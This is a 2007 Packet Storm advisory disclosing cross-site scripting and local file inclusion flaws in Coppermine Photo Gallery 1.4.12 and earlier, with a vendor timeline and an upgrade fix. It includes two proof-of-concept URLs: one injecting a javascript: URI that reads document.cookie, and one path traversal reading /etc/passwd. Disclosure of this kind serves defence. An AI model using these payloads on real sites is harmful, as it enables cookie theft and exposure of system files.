coppermine1412-xss.txt

2007-09-18T00:00:00
ID PACKETSTORM:59387
Type packetstorm
Reporter L4teral
Modified 2007-09-18T00:00:00

Description

                                        
                                            `============================================================  
Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion  
============================================================  
  
Author: L4teral <l4teral [4t] gmail com>  
Impact: Cross Site Scripting/Local File Inclusion  
Status: patch available  
  
  
------------------------------  
Affected software description:  
------------------------------  
  
Application: Coppermine Photo Gallery  
Version: <= 1.4.12  
Vendor: http://coppermine-gallery.net  
  
Description:  
Coppermine is a multi-purpose fully-featured and integrated  
web picture gallery script written in PHP using GD or ImageMagick  
as image library with a MySQL backend.  
  
  
----------------  
Vulnerabilities:  
----------------  
  
The script mode.php does not properly sanitize the "referer" parameter.  
  
The script viewlog.php does not properly sanitize the "log" parameter.  
  
  
------------  
Poc/Exploit:  
------------  
  
http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie)  
  
http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00  
(should need admin privileges)  
  
  
---------  
Solution:  
---------  
  
update to 1.4.13 or above  
  
  
---------  
Timeline:  
---------  
  
03.09.2007 - vendor informed  
14.09.2007 - patch released by vendor  
17.09.2007 - public disclosure  
`